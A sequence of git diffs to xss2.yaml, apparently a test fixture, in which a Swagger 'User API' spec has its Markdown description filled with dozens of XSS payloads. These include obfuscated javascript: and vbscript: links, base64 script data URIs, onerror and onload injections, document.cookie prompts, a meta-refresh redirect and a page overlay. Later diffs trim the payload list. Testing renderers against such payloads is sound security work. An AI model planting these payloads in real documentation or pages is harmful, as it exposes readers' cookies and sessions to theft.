betillogalvanfbc · February 24, 2025 20:17 · Feb 24, 2025 · Feb 24, 2025 · Feb 24, 2025 · Feb 24, 2025
diff --git a/xss2.yaml b/xss2.yaml
@@ -47,11 +47,6 @@ info:
     [a](Javas&#99;ript:alert(1&#41;)
     [a](Javas%26%2399;ript:alert(1&#41;)
     [a](javascript:alert&#65534;(1&#41;)
-    [a](javascript:confirm(1)
-    [a](javascript://www.google.com%0Aprompt(1))
-    [a](javascript://%0d%0aconfirm(1);com)
-    [a](javascript:window.onerror=confirm;throw%201)
-    [a](javascript:alert(document.domain&#41;)
     
     ---
     

diff --git a/xss2.yaml b/xss2.yaml
@@ -41,6 +41,17 @@ info:
       "email": "[email protected]"
     }
     ```
+    [a](javascript:this;alert(1))
+    [a](javascript:this;alert(1&#41;)
+    [a](javascript&#58this;alert(1&#41;)
+    [a](Javas&#99;ript:alert(1&#41;)
+    [a](Javas%26%2399;ript:alert(1&#41;)
+    [a](javascript:alert&#65534;(1&#41;)
+    [a](javascript:confirm(1)
+    [a](javascript://www.google.com%0Aprompt(1))
+    [a](javascript://%0d%0aconfirm(1);com)
+    [a](javascript:window.onerror=confirm;throw%201)
+    [a](javascript:alert(document.domain&#41;)
     
     ---
     

diff --git a/xss2.yaml b/xss2.yaml
@@ -11,32 +11,7 @@ info:
     ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
     [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
     [a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
-    ![a'"`onerror=prompt(document.cookie)](x)\
-    [citelol]: (javascript:prompt(document.cookie))
-    [notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
-    [test](javascript://%0d%0aprompt(1))
-    [test](javascript://%0d%0aprompt(1);com)
-    [notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
-    [notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
-    [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
-    [clickme](vbscript:alert(document.domain))
-    [text](http://danlec.com " [@danlec](/danlec) ")
-    [a](javascript:this;alert(1))
-    [a](javascript:this;alert(1&#41;)
-    [a](javascript&#58this;alert(1&#41;)
-    [a](Javas&#99;ript:alert(1&#41;)
-    [a](Javas%26%2399;ript:alert(1&#41;)
-    [a](javascript:alert&#65534;(1&#41;)
-    [a](javascript:confirm(1)
-    [a](javascript://www.google.com%0Aprompt(1))
-    [a](javascript://%0d%0aconfirm(1);com)
-    [a](javascript:window.onerror=confirm;throw%201)
-    [a](javascript:alert(document.domain&#41;)
-    [a](javascript://www.google.com%0Aalert(1))
-    [a]('javascript:alert("1")')
-    [a](JaVaScRiPt:alert(1))
-    ![a](https://www.google.com/image.png"onload="alert(1))
-    ![a]("onerror="alert(1))
+    ![a'"`onerror=prompt(document.cookie)](x)
     Esta API permite gestionar usuarios con operaciones CRUD. A continuación, se detallan los endpoints y ejemplos de uso.
     
     ---

diff --git a/xss2.yaml b/xss2.yaml
@@ -20,8 +20,6 @@ info:
     [notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
     [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
     [clickme](vbscript:alert(document.domain))
-    _http://[email protected] style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
-    <http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>>
     [text](http://danlec.com " [@danlec](/danlec) ")
     [a](javascript:this;alert(1))
     [a](javascript:this;alert(1&#41;)

diff --git a/xss2.yaml b/xss2.yaml
@@ -39,12 +39,6 @@ info:
     [a](JaVaScRiPt:alert(1))
     ![a](https://www.google.com/image.png"onload="alert(1))
     ![a]("onerror="alert(1))
-    </http://<?php\><\h1\><script:script>confirm(2)
-    [XSS](.alert(1);)
-    [ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]])
-    [ ](http://a?p=[[/onclick=alert(0) .]])
-    [a](javascript:new%20Function`al\ert\`1\``;)
-    
     Esta API permite gestionar usuarios con operaciones CRUD. A continuación, se detallan los endpoints y ejemplos de uso.
     
     ---

diff --git a/xss2.yaml b/xss2.yaml
@@ -0,0 +1,169 @@
+swagger: '2.0'
+info:
+  title: User API
+  description: |
+    # User API 📌
+    [a](javascript:prompt(document.cookie))
+    [a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
+    ![a](javascript:prompt(document.cookie))\
+    <javascript:prompt(document.cookie)>
+    <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+    ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
+    [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
+    [a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
+    ![a'"`onerror=prompt(document.cookie)](x)\
+    [citelol]: (javascript:prompt(document.cookie))
+    [notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
+    [test](javascript://%0d%0aprompt(1))
+    [test](javascript://%0d%0aprompt(1);com)
+    [notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
+    [notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
+    [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
+    [clickme](vbscript:alert(document.domain))
+    _http://[email protected] style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
+    <http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>>
+    [text](http://danlec.com " [@danlec](/danlec) ")
+    [a](javascript:this;alert(1))
+    [a](javascript:this;alert(1&#41;)
+    [a](javascript&#58this;alert(1&#41;)
+    [a](Javas&#99;ript:alert(1&#41;)
+    [a](Javas%26%2399;ript:alert(1&#41;)
+    [a](javascript:alert&#65534;(1&#41;)
+    [a](javascript:confirm(1)
+    [a](javascript://www.google.com%0Aprompt(1))
+    [a](javascript://%0d%0aconfirm(1);com)
+    [a](javascript:window.onerror=confirm;throw%201)
+    [a](javascript:alert(document.domain&#41;)
+    [a](javascript://www.google.com%0Aalert(1))
+    [a]('javascript:alert("1")')
+    [a](JaVaScRiPt:alert(1))
+    ![a](https://www.google.com/image.png"onload="alert(1))
+    ![a]("onerror="alert(1))
+    </http://<?php\><\h1\><script:script>confirm(2)
+    [XSS](.alert(1);)
+    [ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]])
+    [ ](http://a?p=[[/onclick=alert(0) .]])
+    [a](javascript:new%20Function`al\ert\`1\``;)
+    
+    Esta API permite gestionar usuarios con operaciones CRUD. A continuación, se detallan los endpoints y ejemplos de uso.
+    
+    ---
+    
+    ## 📷 Imagen en la documentación
+    ![User API](https://example.com/image.png)
+    
+    ---
+    
+    ## 🎥 Video de referencia
+    Puedes ver un video explicativo aquí:
+    [Watch this tutorial](https://www.youtube.com/watch?v=example)
+    
+    ---
+    
+    ## 🔗 Enlaces útiles
+    - [Swagger OpenAPI Docs](https://swagger.io/specification/)
+    - [Markdown Guide](https://www.markdownguide.org/)
+    
+    ---
+    
+    ## 📌 Ejemplo de Código en la descripción
+    ```json
+    {
+      "id": 1,
+      "name": "John Doe",
+      "email": "[email protected]"
+    }
+    ```
+    
+    ---
+    
+    ## 📋 Tabla de Estado de Usuarios
+    | Estado  | Descripción                 |
+    |---------|-----------------------------|
+    | `active`  | Usuario activo en el sistema |
+    | `inactive` | Usuario inactivo          |
+    | `banned`   | Usuario bloqueado          |
+    
+    ---
+    
+    ## 🚀 ¡Comienza ahora!
+    Usa los endpoints abajo para interactuar con la API.
+
+paths:
+  /users:
+    get:
+      summary: Get all users
+      description: |
+        Retorna la lista de usuarios disponibles en el sistema.
+
+        **Ejemplo de respuesta:**
+        ```json
+        [
+          {
+            "id": 1,
+            "name": "John Doe",
+            "email": "[email protected]"
+          }
+        ]
+        ```
+      operationId: getUsers
+      tags:
+        - users
+      responses:
+        '200':
+          description: Éxito
+          schema:
+            type: array
+            items:
+              type: object
+              properties:
+                id:
+                  type: integer
+                name:
+                  type: string
+                email:
+                  type: string
+
+  /users/{userId}/profile-picture:
+    get:
+      summary: Get user profile picture
+      description: |
+        Retorna la imagen de perfil del usuario en formato **JPEG** o **PNG**.
+      operationId: getUserProfilePicture
+      tags:
+        - users
+      parameters:
+        - name: userId
+          in: path
+          required: true
+          type: string
+      responses:
+        '200':
+          description: Imagen de perfil del usuario
+          schema:
+            type: string
+            format: binary
+        '404':
+          description: Usuario no encontrado
+
+  /users/{userId}/video:
+    get:
+      summary: Get user introduction video
+      description: |
+        Retorna un video de presentación del usuario.
+      operationId: getUserVideo
+      tags:
+        - users
+      parameters:
+        - name: userId
+          in: path
+          required: true
+          type: string
+      responses:
+        '200':
+          description: Video de presentación
+          schema:
+            type: string
+            format: binary
+        '404':
+          description: Usuario no encontrado